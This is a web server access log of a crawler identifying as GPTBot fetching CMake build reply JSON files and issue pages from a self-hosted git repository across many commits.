"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:18:07:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" [Client 74.7.227.38] [Length 19986] [Gzip 9.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply" -[17/Feb/2026:18:07:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 12778] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:18:07:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 13605] [Gzip 4.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:18:07:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" [Client 74.7.227.38] [Length 19986] [Gzip 9.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply" -[17/Feb/2026:18:07:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10178] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:18:07:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 1173] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:18:07:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json?display=source" [Client 74.7.227.38] [Length 11632] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" -[17/Feb/2026:18:07:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" [Client 74.7.227.38] [Length 158] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" -[17/Feb/2026:18:07:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 964] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:18:07:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" [Client 74.7.227.38] [Length 11618] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply" -[17/Feb/2026:18:07:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 1173] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:18:07:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" [Client 74.7.227.38] [Length 23184] [Gzip 19.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" -[17/Feb/2026:18:07:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 12460] [Gzip 6.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:18:07:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" [Client 74.7.227.38] [Length 19958] [Gzip 9.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply" -[17/Feb/2026:18:07:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" [Client 74.7.227.38] [Length 12317] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" -[17/Feb/2026:18:07:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10181] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:07:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 13580] [Gzip 4.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:18:07:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 12780] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:18:07:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" [Client 74.7.227.38] [Length 11617] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply" -[17/Feb/2026:18:07:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" [Client 74.7.227.38] [Length 12830] [Gzip 4.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply" -[17/Feb/2026:18:07:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" [Client 74.7.227.38] [Length 158] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" -[17/Feb/2026:18:07:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" [Client 74.7.227.38] [Length 10789] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" -[17/Feb/2026:18:07:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 964] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:18:07:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 12779] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:18:07:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" [Client 74.7.227.38] [Length 12317] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" -[17/Feb/2026:18:07:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" [Client 74.7.227.38] [Length 23158] [Gzip 19.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" -[17/Feb/2026:18:07:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 964] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:18:07:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" [Client 74.7.227.38] [Length 12860] [Gzip 4.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply" -[17/Feb/2026:18:07:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 964] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:18:07:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" [Client 74.7.227.38] [Length 158] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" -[17/Feb/2026:18:07:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" [Client 74.7.227.38] [Length 12597] [Gzip 6.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" -[17/Feb/2026:18:07:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" [Client 74.7.227.38] [Length 1045] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" -[17/Feb/2026:18:07:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" [Client 74.7.227.38] [Length 12317] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" -[17/Feb/2026:18:07:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" [Client 74.7.227.38] [Length 10790] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" -[17/Feb/2026:18:07:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" [Client 74.7.227.38] [Length 19986] [Gzip 9.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply" -[17/Feb/2026:18:07:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 1173] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:18:07:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 12780] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:18:07:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 13604] [Gzip 4.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:18:07:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" [Client 74.7.227.38] [Length 1045] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" -[17/Feb/2026:18:07:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 964] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:18:07:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 13609] [Gzip 4.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:18:07:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" [Client 74.7.227.38] [Length 11590] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply" -[17/Feb/2026:18:07:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" [Client 74.7.227.38] [Length 23185] [Gzip 19.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" -[17/Feb/2026:18:07:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" [Client 74.7.227.38] [Length 11618] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 